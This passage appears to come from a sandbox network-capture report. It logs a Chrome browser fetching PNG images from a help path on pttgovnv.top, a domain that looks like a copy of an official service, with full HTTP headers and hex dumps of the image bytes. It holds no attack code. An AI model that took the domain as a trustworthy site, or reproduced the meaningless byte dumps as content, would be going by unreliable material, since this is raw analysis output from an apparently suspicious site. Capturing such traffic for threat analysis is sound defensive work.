          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: no-cors
          Sec-Fetch-Dest: image
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC724INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: image/png
          Content-Length: 18614
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"48b6-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36235
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6EHgbsxziePATKlaxtRjVSQJ0lmV7sjk%2FkfJaGEQo4msLHl0u1aJKcMlqk26CLGKSzrTUw1%2BuTMwWFrVyPCHHfCa9qRVM1lxuS%2BMM7SKRfqXjpw0kfzMd7iyDHLJPUY%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad19edc34294-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC645INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 48 43 49 44 41 54 78 da ec dd 0b 9c 5c 65 99 e7 f1 e7 84 90 fb a5 93 90 1b 10 ba 02 26 01 01 d3 80 82 e3 a8 69 44 57 47 64 d3 cc 38 82 33 ba 69 c6 11 77 57 19 1a c6 dd 61 76 d5 34 5e 56 66 75 a0 59 76 dc 51 3f 23 95 45 06 65 5c 48 06 71 9c 19 95 0e 8c 0a 08 a4 43 80 90 c4 24 1d 20 e4 9e 74 a7 73 bf d5 be 4f 9d f7 a4 ab ab eb 72 6e 75 ff 7d 3f 9f a2 43 77 5d 4e 9d 3a 55 e7 5f ef e5 79 9d 54 2a 25 00 00 00 a8 2d 0e 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<HCIDATx\e&iDWGd83iwWav4^VfuYvQ?#Ee\HqC$ tsOrnu}?Cw]N:U_yT*%-!Bq8
          2024-09-01 22:25:26 UTC1369INData Raw: 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 21 0e 00 00 00 84 38 00 00 00 10 e2 00 00 00 08 71 84 38 00 00 00 42 1c 00 00 00 08 71 00 00 00 20 c4 01 00 00 10 e2 00 00 00 40 88 03 00 00 00 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 00 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 21 0e 00 00 00 84 38 00 00 00 10 e2 00 00 00 60 8d 60 17 00 00 80 6a 34 fa a1 9e 16 f6 42 7e b4 c4 01 00 80 6a 0b 6e ed e6 d2 66 2e
          Data Ascii: q8@ Bq8@ B!8q8Bq @!Bq8@!Bq8@ B!8``j4B~jnf.
          2024-09-01 22:25:26 UTC1369INData Raw: 8f fa 6b 8d cb a5 5d 1a ac fc 08 2d 71 00 00 84 0f 71 09 f3 63 73 91 ab 69 57 9f ae 9c a0 41 4e 43 5f 59 26 28 c4 59 cb ad 5c 0e 1c 3d 29 d3 1e 59 13 f6 e6 fd 26 2c 37 35 d2 f1 47 88 03 00 a0 78 50 eb cb 57 9f cc fc 5d 7f 3f b9 1a b6 d5 2b 09 72 e3 c5 33 6b 26 b8 65 fb fc 2f 36 ca 7d 3b 06 42 67 57 f3 3a 2d 6f 94 63 93 ee 54 00 00 72 07 37 6d 35 6b 17 b7 e5 ec 26 71 bb 4d 73 a9 68 80 2b 57 2d b7 72 d1 f1 7a 11 42 9c be 66 84 38 00 00 1a 2c b8 35 d9 10 d0 21 c3 bb 3c 3b 72 85 38 5b b4 b7 ec aa a1 24 48 a9 e8 84 0b 79 e1 f5 30 37 d5 89 24 0d b5 9a 03 dd a9 00 00 02 9c 3b d9 60 49 91 ab ad 30 97 d3 93 14 6c 29 11 2d 73 51 96 96 b8 7a 0e 6e d9 42 74 a9 2e 13 b7 76 5c 43 85 38 5a e2 00 00 f0 67 b1 b9 ec 33 e1 6d a5 b8 ab 28 94 25 bc 55 73 49 90 52 09 d8 a5 ba
          Data Ascii: k]-qqcsiWANC_Y&(Y\=)Y&,75GxPW]?+r3k&e/6};BgW:-ocTr7m5k&qMsh+W-rzBf8,5!<;r8[$Hy07$;`I0l)-sQznBt.v\C8Zg3m(%UsIR
          2024-09-01 22:25:26 UTC1369INData Raw: 28 dc fd 97 ea 3d 64 05 e8 52 bd be 11 82 5c 63 8c 89 7b 66 41 e6 38 1f 6f 6d b5 6e 13 e8 ba 89 5c 25 09 70 95 9c d5 e8 55 bc 4f 9a 37 70 77 0c cf a7 55 82 2d 88 bd cc 3c 6e 7b c4 c7 ec 0e d0 3a a1 cf b7 25 86 8a e4 fe 4f a6 9b ee 96 d4 9e 7f c8 7b 12 a8 26 a9 91 67 8b d3 fc 45 91 b3 de 57 fc ca 6b 3f 2f b2 ff b1 c2 d7 99 74 9d c8 45 df 0c 7c 52 93 cd b7 15 df d6 51 f3 c5 b9 f4 fb 7e 82 9c 7e 71 49 d4 c1 c7 85 f7 05 db 77 10 4e ed f8 fe d0 70 a0 c1 60 f6 7f 10 99 f9 ef 83 3c ae 4e 73 ec 0b f0 7e 0c 3d 4e f4 5f de 99 a8 ae 55 1b b4 35 78 f5 b5 e6 1f c5 42 d0 68 f3 a5 e2 87 c1 83 dc 5a f3 d1 bf ff a7 f1 bf 87 32 3c b6 6e 8f 7c f4 85 d7 fd 5c b5 21 c6 c4 35 4a 88 2b 34 e3 6e b5 0c ae 8b e8 ae 8d 48 b8 0b 1b 3e f4 c4 b2 b9 8a 36 49 4f 76 1d 51 be 8d 85 fc 00
          Data Ascii: (=dR\c{fA8omn\%pUO7pwU-<n{:%O{&gEWk?/tE|RQ~~qIwNp`<Ns~=N_U5xBhZ2<n|\!5J+4nH>6IOvQ
          2024-09-01 22:25:26 UTC1369INData Raw: 8c 3a a3 4e db 4d ce ff 2f 22 ab ff b9 ec ef a1 f6 59 93 e4 6b 6f 04 fe f8 de 22 01 4a cc 10 e2 aa 3f c8 f5 a5 83 d9 33 0b 74 7c 83 2e af a2 dd a1 da 15 aa 63 e4 3a 4f af f0 50 ba 40 b7 e5 f4 fd b2 9a 44 b9 e9 eb e0 ad 2e 81 7a 35 fd 66 73 92 f9 f3 fc 7f d7 70 37 e5 06 df 41 ce 69 fe 42 ad ed 81 84 0d 6a ad f6 df 61 96 b9 5a 9a e3 44 d8 6b c3 5d 8f fd d9 30 5f 86 ec 70 8c f4 04 a9 f6 a9 e3 d2 61 ed 8a 59 13 65 c1 59 e3 d2 e3 b5 1a ce 98 39 c1 de 43 73 bf 1a cb c3 6a 97 6a c0 10 a7 bd 6a ed f5 f4 c5 9d 10 37 18 e6 ba ec 3a ab 49 1b e4 96 d8 70 d7 25 ee 72 5d 7d 59 c1 2f 33 d0 b5 db cb c2 10 8f dc 6c 3f 20 97 9a fb 5a 61 c3 1c ad 73 e5 a3 e3 e3 3a 63 58 f1 00 79 3e 62 52 a3 e6 96 fd 51 d3 eb 40 8e d7 75 49 af 75 4f 30 c5 cc ff b2 88 f6 de 15 3c 09 8d 12 39
          Data Ascii: :NM/"Yko"J?3t|.c:OP@D.z5fsp7AiBjaZDk]0_paYeY9Csjjj7:Ip%r]}Y/3l? Zas:cXy>bRQ@uIuO0<9
          2024-09-01 22:25:26 UTC1369INData Raw: 69 78 da d2 64 bb 25 ef 09 78 d3 44 85 02 67 67 19 1f 6f 09 21 ae 80 6d 0f 4b ea 8d ae e1 0b d7 8f bd 52 e4 fc ff 56 db 61 46 03 c5 be 5f 8b ec 5f 25 a9 43 6b c4 39 a6 f3 0c 8e 06 ba 0b ad b4 2f 23 67 88 33 ce ec 87 49 97 89 4c f9 9d 6a 2f bb 52 3e ba dc d7 9e 95 e6 ac f1 4b 49 1d 7f fd 74 79 8d a2 fb 54 cb 6f 8c 35 e7 9f 29 8b ea 63 7f 6e 7d 40 52 6f 7e cb bc 87 f6 0e fd fd f8 f7 9a 4f d8 db 4b f6 1e ba e2 9c 89 e9 4b b6 37 07 8e c9 f3 6f 0e a4 97 3e bb 6f c7 40 be 9b b7 11 e2 ea 23 c8 f5 ca d0 6e a9 c9 e2 76 af 69 b8 6a b1 27 79 ef 44 ef 2d 5b e3 8d 9f 13 1b f8 7a 43 8f 55 1b 0c 73 6d b6 c5 c4 ef 98 39 bd 5e 77 3a 04 12 e4 3c c9 10 21 ae 12 53 d0 5b cb fd 80 b5 dc 75 10 90 8e 7b d9 e7 7b 1f af fd bc 09 38 8f 89 93 eb 6f 87 9f 15 79 d9 bc 2d cf fb 8a c8
          Data Ascii: ixd%xDggo!mKRVaF__%Ck9/#g3ILj/R>KItyTo5)cn}@Ro~OKK7o>o@#nvij'yD-[zCUsm9^w:<!S[u{{8oy-
          2024-09-01 22:25:26 UTC1369INData Raw: 7e f3 fb 2c 8d 17 e2 4c 78 6b b7 3b 39 e7 92 33 be 97 d1 70 27 00 b4 da 17 43 c7 ce e8 12 2b da 65 9a 4a 4f 2c 70 5b dc 3a ed 6c 51 af ff 7a 59 46 58 7c c2 86 bf f2 b4 ca b9 41 ae 4d fc 8f 91 4b 36 ea 89 d9 1c 03 6d 12 bc 4e 5c 23 04 aa 7e 8a fd d6 11 6d 21 aa d6 00 e7 9d e0 df fc 1b 77 cc 54 ae 90 30 66 41 e5 36 6c ec 5b fc 05 38 1d 3f 57 45 9c d4 80 a4 5e f9 64 de 7d 5a 11 27 0f 94 ee be d7 df 27 a9 35 1d e9 00 16 1b 6d 9d 33 01 2b dd 3a 36 f0 6a be 30 a7 79 60 9f 0c ce 28 ed b4 3f bb ed ef 36 db dc 30 f4 3c 73 62 bf db f2 b6 2b f7 30 8d f4 ef 87 3e e6 64 89 30 04 ac a6 42 9c 8e 7b d3 e2 a8 76 e7 36 17 49 c8 7e 83 91 17 e4 b2 df 11 8b 64 70 26 c9 a3 36 9d eb 8b 96 3d 60 f1 56 29 67 ab 9c bb bd 9d 3e af dd dc c0 ad 71 61 be dd 94 3b 50 15 5b 2e ab 14 3a
          Data Ascii: ~,Lxk;93p'C+eJO,p[:lQzYFX|AMK6mN\#~m!wT0fA6l[8?WE^d}Z''5m3+:6j0y`(?60<sb+0>d0B{v6I~dp&6=`V)g>qa;P[.:
          2024-09-01 22:25:26 UTC1369INData Raw: b6 7e af be 8f f7 5c 61 68 c1 ed e9 e2 bd 05 03 f7 94 2b dc 8b 09 7a 4e ef 03 d1 c2 5c d4 2f 99 b3 3e 66 be 5c de 32 ec eb 98 44 9c 6c 56 15 21 ce 9c c0 3b ec 13 89 b3 14 b5 86 82 68 61 cb ed 16 d5 95 1b 32 b7 ef 1e 3b a9 a0 b3 6c 6b a9 16 b6 dc 47 88 ab 76 4b 2a fc f8 9d 82 fa b2 e3 91 fa 3e a9 8d 18 1d e0 ec 31 2e be 00 e7 dd e5 d4 eb 45 76 7e 2b f8 0d 75 0c 98 9f 31 69 95 12 72 05 09 e7 2d 77 c7 b3 92 c2 8c 0f 8b 6c 7f 28 f8 92 69 1a 90 ab 7d df fa 4a 24 e3 8b ef eb 73 6f 12 39 ff 4f 82 bd 3e da 52 77 d1 1d 26 48 7d 40 52 1b bf 1d 6f b9 92 a2 cf 69 a2 38 f3 fe 22 57 17 aa d2 6c d1 1b e9 a3 a0 c2 e1 4d 4b 86 f4 8a 5b 29 39 ee b5 44 16 db d6 bd e8 dc 96 b7 84 b9 dc 69 93 b3 be 1a 4f d8 3a 72 ad 55 10 e2 10 de 4a 66 6c d6 9f d4 a1 35 35 bc f1 3e 46 da 8c
          Data Ascii: ~\ah+zN\/>f\2DlV!;ha2;lkGvK*>1.Ev~+u1ir-wl(i}J$so9O>Rw&H}@Roi8"WlMK[)9DiO:rUJfl55>F
          2024-09-01 22:25:26 UTC1369INData Raw: b4 19 a7 da 52 d2 51 6c c0 b9 ae 4d 69 1e 4f af eb a7 5b 55 b7 a9 de 43 5c ae 96 a5 2e 3b 7b 35 9f d6 ac ff bf d5 ec d3 64 1d 0e f6 df 62 8f 29 ca b1 94 9b 9e 88 e6 7d 89 fd 50 95 9f 18 e6 64 d6 ff bc c8 c1 35 92 3a fc f2 90 e2 bd 25 6b 69 3b be af 3a f7 c5 e1 57 c3 7d 49 59 55 c2 2f 28 c7 b7 d7 5f 8b 67 0c 61 28 16 19 61 4e 16 fc 79 1c 5d a3 19 5f 86 f6 8b bc fa 0d 77 e9 ae 5c c7 cc f6 87 c5 99 fd 81 cc 16 be c9 12 a1 20 7f 2c 21 2e a6 65 8f c2 9c 68 35 c1 ae f2 71 bd 66 2d 28 dc 60 03 d9 bd ae e8 7c af 99 b6 98 2e cc 19 fc ea 67 92 43 ce ee 78 a0 e1 68 b7 e8 c0 1a 13 dc 9e 91 d4 91 75 c3 ba e9 ca 16 16 ce 98 50 95 bb 27 95 3a 12 6a 1f 38 d5 d6 52 56 a5 fb 37 6c 18 4a bd d4 19 df 92 57 79 c2 9c ac fa b4 c8 ac 8f 46 ab 3f e7 d9 f7 bc a4 d6 7f b3 78 77 ef
          Data Ascii: RQlMiO[UC\.;{5db)}Pd5:%ki;:W}IYU/(_ga(aNy]_w\ ,!.eh5qf-(`|.gCxhuP':j8RV7lJWyF?xw
          2024-09-01 22:25:26 UTC1369INData Raw: 98 30 2d 44 51 8e a7 30 fb bf 99 97 a9 81 fc f6 2b e1 6f 3b f3 16 71 de f1 2b 91 73 6f 8a dc 0d e7 9c dc 53 3f fb 74 f4 2c 8e ab 6a 61 42 96 37 8e 4d c7 bd a5 2f 57 3d 14 4f 80 cb 3c 7e b5 75 4c c7 d4 bd eb 71 71 12 9f 4b 07 c5 c8 f7 39 b5 d5 dd 5e ed ba cd 1d e0 7e 69 bf 74 c7 d6 03 38 a2 14 af 81 0d 51 da 1a b1 22 c0 cd 96 e8 38 b5 b8 02 15 41 2e eb 33 ea a1 9e 0e 29 3c 56 70 45 83 ad 68 51 4a 89 32 87 38 7d 7d 13 ec f6 06 a0 93 19 0e 86 f9 5e 31 5a 64 c1 f7 cd 91 f9 b9 f8 b6 a5 9e 5a a2 9a ae 0a 77 bb be df 70 4c 96 8a 86 36 0d 42 a5 5c df d4 86 46 39 ef 86 74 50 4c 07 47 7d 8f 68 37 e8 c8 89 3e de 56 e7 ba c1 6d 9e 1b 06 e5 92 af 14 db de df b5 9f f1 9d b1 6d 7e a9 f6 8b ed a2 6c b3 e1 e1 1e 9f 37 d3 ae 3e 2d 17 d2 16 c7 58 35 5b 7a 44 83 5c b7 14 ee
          Data Ascii: 0-DQ0+o;q+soS?t,jaB7M/W=O<~uLqqK9^~it8Q"8A.3)<VpEhQJ28}}^1ZdZwpL6B\F9tPLG}h7>Vmm~l7>-X5[zD\


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          74192.168.2.449816104.21.47.250443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:25 UTC361OUTGET /help/layout/images/37.png HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          Accept: */*
          Sec-Fetch-Site: none
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: empty
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:26 UTC730INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:26 GMT
          Content-Type: image/png
          Content-Length: 15414
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:36 GMT
          ETag: W/"3c36-18fc3d82ee0"
          CF-Cache-Status: HIT
          Age: 36235
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G54sAbjm9m%2FfWYLqV%2BxBVxs7TwTpacB%2BK0yNuZ4VbtatdR4PWKzVDorXXLfYyPOkZdc3GnhMhRaIozaI9joBN0brJ73iOueXxje8YU9Cs%2BtgIUL%2FMj%2B5ZqRoS1eIPKM%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8ad19fd94334e-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:26 UTC639INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 3b c3 49 44 41 54 78 da ec dd 6d 8c 2b d7 7d df f1 c3 da 90 a5 44 ce 52 b0 62 29 96 93 a5 64 f9 b9 32 79 13 a3 68 d5 3a cb 2d fa a2 70 dd 5e de 06 86 e0 02 c5 72 e3 b8 2f 02 3b 97 d7 05 82 28 49 7b 79 0b 27 36 82 36 97 b7 71 d3 a2 86 7b b9 09 fa 60 38 85 78 51 37 7d d1 22 97 0b 37 ea 8b ba 16 d7 46 24 47 96 2c 6e 12 39 76 22 57 5c 5b b1 6c d5 32 3b 7f ee 7f 76 0f cf ce 90 c3 e1 cc f0 61 be 1f 80 b8 12 c9 1d ce 9c 79 fa cd 39 67 ce 14 86 c3 a1 01 00 00 c0 6a f9 4b 14 01 00 00 00 21
          Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<;IDATxm+}DRb)d2yh:-p^r/;(I{y'66q{`8xQ7}"7F$G,n9v"W\[l2;vay9gjK!
          2024-09-01 22:25:26 UTC1369INData Raw: 42 1c 00 00 00 08 71 00 00 00 20 c4 01 00 00 10 e2 00 00 00 40 88 03 00 00 00 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 00 21 0e 00 00 80 10 07 00 00 00 42 1c 00 00 00 08 71 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 21 0e 00 00 00 84 38 00 00 00 10 e2 00 00 00 40 88 03 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 21 0e 00 00 00 84 38 00 00 00 10 e2 00 00 00 08 71 00 00 00 20 c4 01 00 00 80 10 07 00 00 00 42 1c 00 00 00 21 0e 00 00 00 84 38 00 00 00 10 e2 00 00 00 08 71 00 00 00 20 c4 01 00 00 80 10 07 00 00 40 88 03 00 00 00 21 0e 00 00 00 84 38 00 00 00 42 1c 00 00 00 08 71 00 00 00 20 c4 01 00 00 80 10 07 00 00 40 88 03 00
          Data Ascii: Bq @!Bq8@!Bq8@ B!8@ B!8q B!8q @!8Bq @
          2024-09-01 22:25:26 UTC1369INData Raw: c7 85 c4 fc 17 12 13 df 7b e5 0f 99 c2 3d 1f 48 e7 97 a5 56 4e ee 60 ed 7f 22 68 dd 4a f3 ea ca dd c0 a3 4d a7 6d 9d ff a4 fb 02 13 e0 08 71 e9 d0 0d eb 90 92 00 66 26 07 fa 26 c5 10 af ec 74 ec 37 c4 b3 1f 32 a0 b2 84 b8 d3 da b8 d7 bf cf 98 db d2 ab cc 1c 7e f5 e3 c7 37 3d 9c 6d 5e bd aa 41 7d 25 42 b8 d5 74 9a c6 f0 3f 04 38 42 5c ea 6a 63 3b 3e 80 a8 2e 26 35 86 5c 0e 35 bc 20 47 d9 cd ee 86 09 1f 1a 6a e0 5e 58 14 de f8 70 2a cd aa 27 41 4e 6e 7a 90 e6 d5 17 be e4 7e 24 81 a8 6b 96 b8 2f a8 74 89 48 a9 e9 94 00 47 88 cb 8e b7 91 c9 46 5c 35 d4 c8 01 71 34 29 82 58 36 28 bb 99 c3 db 76 e1 c1 83 9a f5 b8 ad 20 52 1b b7 7f f2 7f b7 bf 25 bd 66 55 9f 34 af 7e e1 a1 a0 bb 57 cb 1a e4 96 6a 3c 52 eb ae d3 c7 4c 7a c3 28 11 e0 62 7a 25 45 10 2f c8 69 47 ed
          Data Ascii: {=HVN`"hJMmqf&&t72~7=m^A}%Bt?8B\jc;>.&5\5 Gj^Xp*'ANnz~$k/tHGF\5q4)X6(v R%fU4~Wj<RLz(bz%E/iG
          2024-09-01 22:25:26 UTC1369INData Raw: 72 c1 41 ce 79 4c 97 04 b9 5f bc ff 87 09 70 84 38 00 39 0d 70 32 6e 5d 2b e1 c9 12 e2 e6 d3 67 cb 24 c8 05 06 39 79 4c 97 13 e4 7e e5 27 5e 67 3e 59 be 87 00 47 88 03 90 43 6d 93 7c 7f ae 4e 5e 0a 6f f8 68 59 42 70 d2 e3 74 11 e2 96 33 c8 8d 3f 6b f5 dc 9e 29 dc f9 de ec b7 b9 80 20 f7 d3 6f b9 33 a9 20 27 cb d8 60 95 2f 87 57 52 04 00 82 68 0d 9c 04 b8 a4 1f 94 7d e0 5d c5 e7 29 84 34 13 5f 37 c9 3f 01 02 c9 05 39 59 37 a7 43 7b bc e9 97 4d c1 1c 3f 36 2b eb 20 27 bf 6b ee 7a cf 58 90 13 ef 3f 78 76 9e 00 57 cd 53 7f d6 65 47 4d 1c 80 a0 00 57 d5 93 d2 f9 14 26 df ca 4b 39 0e 1f 2d 4b 7b da c5 a4 43 30 5b e8 d2 1a 18 b7 46 ce 0f 72 ab 5f 23 47 80 5b 42 d4 c4 01 b0 c3 9b dc 81 2a 4d 25 5b 29 fd c4 a1 77 12 68 e7 28 c0 75 53 98 74 37 a3 45 68 79 cb 90 f5
          Data Ascii: rAyL_p89p2n]+g$9yL~'^g>YGCm|N^ohYBpt3?k) o3 '`/WRh}])4_7?9Y7C{M?6+ 'kzX?xvWSeGMW&K9-K{C0[Fr_#G[B*M%[)wh(uSt7Ehy
          2024-09-01 22:25:26 UTC1369INData Raw: 79 be 84 38 00 a1 9e 93 bb 3d 67 3c 21 54 cd f1 f3 25 e5 b5 99 c2 3c 49 73 cf 23 de ef 5c f3 e6 ad c1 2a 8a 4d 9a 0c db f2 5a f7 ce fa 98 ba bf 5e 8d f2 dd c1 e0 db e6 8e ff f1 a4 f9 fc 5f d9 1c ef 27 77 7f c3 14 5e 7d bf 19 f6 7f 3d 93 7e 72 72 63 45 41 fe 63 3c c8 5d d5 0b ca 3a 6b 95 10 07 20 ee 01 f6 a1 72 d7 1c 77 8e 6e e8 09 a2 9d 52 98 bb 28 fd 78 bc df e3 a0 1d 8d d4 aa 8e fa 78 c9 fa a1 d6 0d 56 3f b8 e8 5e 78 c9 fc f8 fe d3 e6 f7 fe da bd 66 fb 1e ab a7 85 dc f0 f0 83 f7 1f 0f 0b b2 b8 20 e7 d7 26 72 4c 20 c4 01 48 28 d0 95 bc 93 45 d3 a4 f3 e0 f7 1d 6f da 86 20 37 c6 7f a2 80 04 b6 81 06 ea 1e b5 6d 08 30 7e 23 43 54 2f 7f df fc cd ff f9 b4 f9 17 6f bb db 7c f8 81 bb 4e df 97 81 81 7f a2 73 3c 50 6f 06 37 3c 10 e4 08 71 00 b2 09 73 4d 2f 6c 75
          Data Ascii: y8=g<!T%<Is#\*MZ^_'w^}=~rrcEAc<]:k rwnR(xxV?^xf &rL H(Eo 7m0~#CT/o|Ns<Po7<qsM/lu
          2024-09-01 22:25:26 UTC1369INData Raw: cd f0 f1 f7 9b e1 57 3f 3e ba 69 42 fa db 45 09 70 27 9e ff 7d f7 9d ea 3a 6c 74 d4 c4 21 6d 12 4a 76 92 0c 4e f2 c0 75 0d 88 8b bc ea 2e a6 10 28 0f 17 bc 5c 72 85 7e 33 a5 69 b7 d7 e5 a0 09 04 1c 0f d2 ba 99 e1 28 85 00 e7 f3 07 06 96 7d b3 7c f2 ae f4 93 bb fd 8d 66 f8 87 3f 3f 5b 48 8a 7a c1 e8 05 b0 82 34 79 be ee a7 34 b4 3d 66 cc b7 bf 62 86 df fd 6a 7a cd b9 e2 8e bf 7e 26 2e ae c3 b6 47 4d 1c d2 96 74 1f b6 0d b3 1c 77 3d b6 cd 9a d4 c2 9d 1c 5c 1f 2a cb ef a7 75 93 c3 16 37 39 60 8d a5 51 0b 97 66 80 f3 f5 34 c8 8d ef f7 c5 77 8e c6 93 4b eb b9 ab d2 bc 39 aa 55 f3 6b d6 a4 09 37 c5 00 57 78 dd 07 ed a6 d4 a5 38 de 12 e2 b0 12 f4 ee c7 a4 c7 22 93 40 b0 b0 20 e7 fd 76 dd a4 f3 40 eb 65 b8 69 a3 61 52 1c 3b 8e 3d 02 eb c6 3b 1e 34 4d f2 8f dd f3
          Data Ascii: W?>iBEp'}:lt!mJvNu.(\r~3i(}|f??[Hz4y4=fbjz~&.GMtw=\*u79`Qf4wK9Uk7Wx8"@ v@eiaR;=;4M
          2024-09-01 22:25:26 UTC1369INData Raw: 42 1c 07 e7 a5 0c 13 72 b3 83 f7 92 9d f3 ca 1a ad b3 2b b2 4c 4b 3e 90 67 dc 13 5a 52 c3 c4 1c e6 75 9b 4f 83 3e 99 60 8f c3 65 72 db c2 9c b5 70 04 b8 38 db f1 9b 7f 2d a8 ff db da 3d bc 9e 10 c7 c1 27 ce 01 65 a9 77 00 1d 5c f6 de 15 3f 11 49 bf a4 73 ba 2c 6b 47 b7 a1 a4 4e 4c ed 29 9f cd db cc be 97 f2 f3 33 97 51 5a 77 12 af fc 45 55 cc c7 6f c5 dd 8f 09 70 71 02 dc 6b 77 dd 1a 38 d9 96 b7 cd 1a 3e bc 9e 10 97 23 7a 77 e0 3c b5 54 47 ab b2 13 c8 b2 ea c1 6f d5 c2 9c 84 b7 6d 6f de ab 6b 58 fb e6 ae a3 ae 39 ee 58 3c 0f a9 85 0b ed d7 a2 e1 ab 35 e7 36 9f bb 01 85 b5 dc aa 66 3d bb 27 cc 13 e6 67 3e fe cd 51 0b 97 a7 00 57 1d fb bf 97 be 1e 7f 4a b7 78 87 fc d2 4f bb ef 4a ed 5b 97 4d 98 10 b7 0e 27 ce e6 1c 07 e6 c6 aa 0c 2e 1b 10 e6 ee d0 c0 b0 8c
          Data Ascii: Br+LK>gZRuO>`erp8-='ew\?Is,kGNL)3QZwEUopqkw8>#zw<TGomokX9X<56f='g>QWJxOJ[M'.
          2024-09-01 22:25:26 UTC1369INData Raw: e8 f2 0c fb 64 4b b7 9f 81 73 51 75 79 c6 f9 bf a6 fb f7 c0 09 ff 3d 6b 7f 9d c5 76 40 e0 6e 4d d9 5e 02 8f 31 49 4e 03 e1 c1 3b 70 3d 7f e7 59 b7 19 f5 48 83 33 41 39 21 34 a7 2e bf 6a 02 d3 08 aa 49 99 56 b3 52 71 76 ca 2d 27 cc 6c cd 38 0f 32 ad ab 1a 50 26 2d 5f 65 42 6d 50 d7 3d 50 e8 bc 84 fd 6d d5 f9 6e 5d 4f 7c 9b 11 e6 f7 b2 9e 90 27 cd db f9 88 65 3f 4b b9 9b 19 02 9c d1 65 09 2a d7 a0 93 fe 56 c0 3a 99 d6 ac 51 8f b1 bd c9 ef f4 34 74 9f b9 38 d0 30 79 35 c2 7a 90 cf 1f 71 97 4d a7 5b 9e 73 7f 8a b3 2e a3 5c 70 cd 33 5f c5 80 6d b0 12 72 81 d5 0e d9 ae 6a 33 ee 93 97 cd d9 be 49 71 d6 f9 45 99 8e b3 3f d6 62 06 b8 b1 7d d7 9b 66 4b 2f ce 36 63 1e 63 fc 60 3a d7 34 30 51 e0 c5 86 13 e0 8c 61 48 11 42 5c 0e 75 f4 ea 25 2e a9 cd e8 27 3c 4f 95 90
          Data Ascii: dKsQuy=kv@nM^1IN;p=YH3A9!4.jIVRqv-'l82P&-_eBmP=Pmn]O|'e?Ke*V:Q4t80y5zqM[s.\p3_mrj3IqE?b}fK/6cc`:40QaHB\u%.'<O
